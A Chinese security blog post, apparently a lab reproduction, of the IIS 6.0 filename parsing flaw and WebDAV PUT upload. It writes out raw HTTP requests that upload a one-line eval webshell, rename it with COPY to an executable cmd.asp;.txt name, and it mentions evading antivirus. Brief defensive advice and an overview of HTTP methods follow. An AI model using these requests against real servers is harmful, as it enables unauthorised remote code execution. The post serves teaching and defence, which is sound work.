IIS6.0解析漏洞——PUT方式上传文件

最新推荐文章于 2024-08-07 20:26:42 发布
最新推荐文章于 2024-08-07 20:26:42 发布
阅读量3.8k 收藏 8
点赞数 1
分类专栏: Web安全 漏洞复现 理论基础 文章标签: IIS6.0 解析漏洞 PUT上传 安全防范 HTTP请求方法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46684578/article/details/119942118
版权

IIS6.0解析漏洞

IIS6.0解析漏洞

解析漏洞原理介绍

1. 当建立 *.asa、*.asp 格式的文件夹时,其目录下的任意文件都被IIS当做asp文件解析

2. 当文件是 *.asp;1.jpg ,IIS6.0同样会将文件作为asp文件解析

同时以下三种也可作为asp文件执行(只要是用asp.dll解析的文件,都可以被当做asp执行),也可以手动设置后缀名

test.asa;1.jpg

test.cer;1.jpg

test.cdx;1.jpg

PUT上传原理

WebDVA 基于HTTP1.1协议的通信协议使得HTTP支持PUT MOVE COPY DELETE方法

1. 探测是否存在IIS PUT 漏洞

OPTIONS /HTTP1.1
Host:www.xxx.com

2. 上传txt文件

PUT /a.txt HTTP1.1
Host:www.xxx.com
Content-Length:30

<%?php eval($_POST['a']);?%>  #上传的文件内容

3.通过Move或Copy重命名

COPY /a.txt HTTP1.1
Host:www.xxx.com
Destination:http://www.xxx.com/cmd.asp;.txt    #将a.txt重命名为cmd.asp(由于解析漏洞)

4.删除

DELETE /a.txt HTTP1.1
Host:www.xxx.com

PUT上传探测

OPTIONS 探测 和 自动化工具探测(kali中的nikto)

#利用nikto探测
-nikto -h IP

PUT上传利用(漏洞复现)

利用burpsuite抓包,根据PUT上传原理,修改相关参数

PUT的利用

第一行改为 PUT /123.txt HTTP1.1

将一句话木马<%?php eval($_POST[‘a’]);?%>写在最后

在这里插入图片描述

COPY的利用

将根目录下的文件123.txt 重命名为 123.asp;aaa.jpg(这样操作符合解析漏洞,又能避免查杀)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ILzzdz9Y-1629989027744)(E:\desktop\file\Scrshot\20210726170852.png)]

在这里插入图片描述

下面就可以利用Cknife、蚁剑等软件getshell

PUT文件上传防范

  1. 主目录关闭写入权限
  2. WebDVA设置为禁止

解析漏洞防范

  1. 自己编写正则表达式,禁止上传xx.asp;.jpg类型的文件
  2. 做好权限设置,限制用户创建文件夹

补充:HTTP 中请求方式汇总

在这里插入图片描述

1. OPTION

返回服务器针对特定资源所支持的HTTP请求方法,也可以利用向web服务器发送 ‘*’ 的请求测试服务器的功能性

2. HEAD

与GET方法类似,只不过不返回消息体。

HEAD的用法

  1. 检查资源有效性
  2. 检查超链接的有效性
  3. 检查网页是否被篡改
  4. 多用于自动搜索机器人获取网页的标志信息,获取rss种子信息,或者传递安全认证信息等

3. PUT

向指定位置上传新的内容,用作添加内容

4. DELETE

请求服务器删除Request-URL所标识的资源

5. TRACE

回显服务器收到的请求,主要用于测试或诊断

6. CONNECT

HTTP/1.1 中预留给能够将连接改为管道方式的代理服务器。

Buffedon
关注
专栏目录
IIS6.0漏洞之PUT上传
7Riven's blog
12-04 1397
IIS简介 IIS(Internet Information Services,互联网信息服务),是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。最初是Windows NT版本的可选包,随后内置在Windows 2000、Windows XP Professional和Windows Server 2003一起发行,但在Windows XP Home版本上并没有II...
IIS6.0漏洞学习-PUT漏洞和短文件名解析漏洞
willow_liang的博客
10-20 662
简介 IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。最初是Windows NT版本的可选包,随后内置在Windows 2000、Windows XP Professional和Windows Server 2003-起发行,但在Windows XP Home版本_上并没有IISIIS是一 -种Web (网页)服务组件,其中包括Web服务器、FTP服务器、 NNTP服务器和SMTP服
IIS6 PUT漏洞
最新发布
2201_75891821的博客
08-07 361
IIS Server 在 Web 服务扩展中开启了 WebDAV ,配置了可以写⼊的权限,造成任意⽂件上传
iis6.0-put漏洞
m0_65150886的博客
10-17 698
根据put协议,当我们浏览某个网站,访问某个资源时,如果网站存在这个资源,则会进行替换,若网站不存在这个资源,则会创建这个资源,所以我们可以利用put直接对网站写shell。而IIS Server 如果在 Web 服务扩展中开启了 WebDAV ,配置了可以写入的权限,结合put协议就会造成任意文件上传漏洞
iis6.0 put漏洞
wjq18827615690的博客
01-31 342
iis6.0-put漏洞上传复现 首先准备window server 2003r2 +iis6.0 然后搭建一个网站(需要启用webDAR) 一、搭建网站 初始页面选择存放路径权限给的大一点添加一个可以解析的asp文档 网站添加一个erverone权限二、漏洞扫描() http://192.168.0.178:80|Microsoft-IIS/6.0|http://192.168.0.178/20213705113750.txt|webdva漏洞 来源模式一 咱们到靶机中查看发现网站根目录下一个文件
IIS6.0 PUT上传漏洞
课嗨教育的专栏
09-15 1726
它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使应用程序可对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。该漏洞产生原理来源于服务器配置不当,利用IIS PUT Scancer 扫描有漏洞IIS漏洞主要是由于IIS服务器开启了webdav的组件导致IIS支持PUT写入功能。修改域名—>数据包格式选择PUT—>选择你要上传的大马—>提交数据包—>返回201成功。webdav扩展开启。
IIS6.0PUT漏洞的利用
a6831115的博客
08-31 1213
title: IIS6.0 PUT漏洞 tags: 环境配置,漏洞利用 grammar_cjkRuby: true --- 一、IIS6.0PUT漏洞的利用 演示: 转载自:https://www.2cto.com/article/201311/259656.html 利用IIS PUT Scaner扫描有漏洞iis,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前...
Web安全——文件上传漏洞
Newscoo的博客
08-01 467
文件上传漏洞什么是文件上传漏洞?一、解析漏洞1、IIS解析漏洞IIS6.0解析漏洞时存在以下两个解析漏洞:WebDav漏洞2、Apache解析漏洞3、PHP CGI解析漏洞二、绕过上传漏洞1、客户端检测2、服务器端检测三、文本编辑器上传漏洞四、修复上传漏洞总结网安小白又又又来瞎咧咧了!!!如有不足,请多指教!!! 什么是文件上传漏洞? 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力,这种攻击是最为直接且有效的,有时候几乎没有技术门槛。 在当前社会发展的情况下,
运维知识点-IIS
aming小老弟
01-19 3708
HTTP.sys的功能类似于转发器,将接收到的Web请求,发送到运行网站或Web应用程序用户模式进程的请求队列,并将响应发送回客户端。对WWW服务执行所有基于文本的日志记录;微软关于漏洞的公告:https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2015/ms15-034。更多分析见:https://blogs.360.cn/post/cve_2015_6135_http_rce_analysis.html。
文件上传攻击与防护
qq_57307348的博客
02-20 1403
文件上传攻击 稍有经验的开发者都知道对文件上传功能进行一些限制,防止用户上传网页木马文件,但是如果开发者没有使用有效的限制手段,往往不能很好的阻止攻击者上传木马文件,以下是常见的限制手段和绕过限制手段进行上传攻击的方式 文件上传漏洞—绕过js检测 客户端使用javascript对上传的文件做了限制,不允许上传以php结尾的文件。 在本实验中,可以通过Burp拦截服务器响应包信息,修改限制条件,让.php为后缀的文件能够顺利上传。 先创建一个包含一句话木马的php文件,选择上传 点击上
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)-附件资源
03-05
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)-附件资源
文件上传绕过和提权——(感谢公司搭建靶机和给予帮助的各位同仁)
爱上卿的博客
04-11 2885
文件上传和提权漏洞测试(测试环境为IIS6.0,存在文件解析漏洞)获得网站后台后,寻找上传点upfile均对木马格式进行了过滤,于是利用IIS6.0本身漏洞,建立xx.ASP文件,来允许上传和调用木马。方法一:登录后台有数据库备份功能,利用数据库备份创建类似x.asp 的目录n  利用文件上传模块上传包含一句话的图片木马(一句话图片木马见百度) 修改上传路径(修改后缀和修改conten-type尝...
渗透测试之中间件安全
Blood_Pupil的博客
05-21 4293
IIS 版本 漏洞 可利用度 利用场景 6.0 Put漏洞 (默认状态?) Webshell上传 1.0-10.0(全版本) 短文件名猜解 低 敏感文件下载,猜后台,猜敏感文件 6.0 远程代码执行(ms-16-016) 高 提权 PUT漏洞 短文件名猜解漏洞 漏洞形成原因 此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(〜)波浪号引起的。 利...
IIS6.0 put文件上传GetShell
内心不种满鲜花就会长满杂草
05-24 2618
IIS服务器开启了webdav服务扩展,又设置了来宾账户对web目录拥有写入权限时,可以被恶意攻击者利用,直接上传恶意文件。
Iiswriter结合菜刀,iis6.0 完成通过put方法拿下服务器权限
java_java_cl的博客
12-31 441
实验报告 实验环境:虚拟机windows 2003 一台 ,物理机一台,iiswriter工具,中国菜刀工具。 实验要求及目的: Iiswriter结合菜刀,iis6.0 完成通过put方法拿下服务器权限(iis http协议本身漏洞) 在虚拟机中搭建网站。 在物理机使用iis工具操作 put提交方法txt as 等文件,使用 move移动方法将提交的文件改为shell.a...
IIS6.0PUT漏洞复现
weixin_46062722的博客
02-25 244
环境介绍 系统: windows server 2003 容器:IIS6.0 2、在 windows 2003 机器中开启 Internet 服务,配置属性种的主目录,勾选写入权限 3、在本地计算机 -->Web 服务扩展中 --> 开启 WebDAV 服务 DotNetSan 进行 ip 段扫描 找到了我们的靶机 右击上传文件,选择PUT,上传ASP一句话 然后选择MOVE,下面的名字改为你想要的 蚁剑连接 拿到shell ...
IIS上传漏洞(实验环境)
3569
07-22 3110
文章提供参考 ,请不要利用技术去干坏事哟~ 好不容易找到了有模拟环境网站 ,就试验了好几个上传漏洞,这里先将IIS路径解析漏洞试验下 因为我打开的训练场名字就是IIS路径解析漏洞,所以直接奔主题 创建asp的一句话木马  更改文件名  1.asp 然后上传1.asp文件,并且提交 之后显示错误 ,如下 尝试用 burpsuite 抓包,修改文件路径
IIS-PUT文件上传漏洞
2301_77315080的博客
10-17 821
漏洞的产生原因来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞IIS,此漏洞主要是因为服务器开启了WebDAV的组件导致的可以扫描到当前的操作,具体操作其实是通过WebDAV的OPTIONS来查询是否支持PUT。根据put协议,当我们浏览某个网站,访问某个资源时,如果网站存在这个资源,则会进行替换,若网站不存在这个资源,则会创建这个资源,所以我们可以利用put直接对网站写shell。上的文件夹,该扩展也存在缺陷,可以被恶意攻击者利用,直接上传恶意文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Buffedon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值